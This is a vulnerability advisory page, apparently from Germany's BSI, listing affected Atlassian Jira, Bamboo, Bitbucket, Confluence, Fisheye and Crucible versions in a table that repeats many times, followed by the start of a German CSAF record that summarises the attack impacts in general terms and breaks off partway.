Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
References
4 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Bamboo ist ein Werkzeug zur kontinuierlichen Integration und Bereitstellung, das automatisierte Builds, Tests und Freigaben in einem einzigen Arbeitsablauf verbindet.\r\nBitbucket ist ein Git-Server zur Sourcecode-Versionskontrolle.\r\nConfluence ist eine kommerzielle Wiki-Software.\r\nFisheye ist ein Quellcode-Repository-Browser f\u00fcr Unternehmensteams. \r\nCrucible ist eine Code-Review-L\u00f6sung f\u00fcr Unternehmensteams.\r\nJira ist eine Webanwendung zur Softwareentwicklung.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira und Jira Service Management ausnutzen, um beliebigen Code auszuf\u00fchren, erweiterte Berechtigungen zu erlangen, Sicherheitsma\u00dfnahmen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszul\u00f6sen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
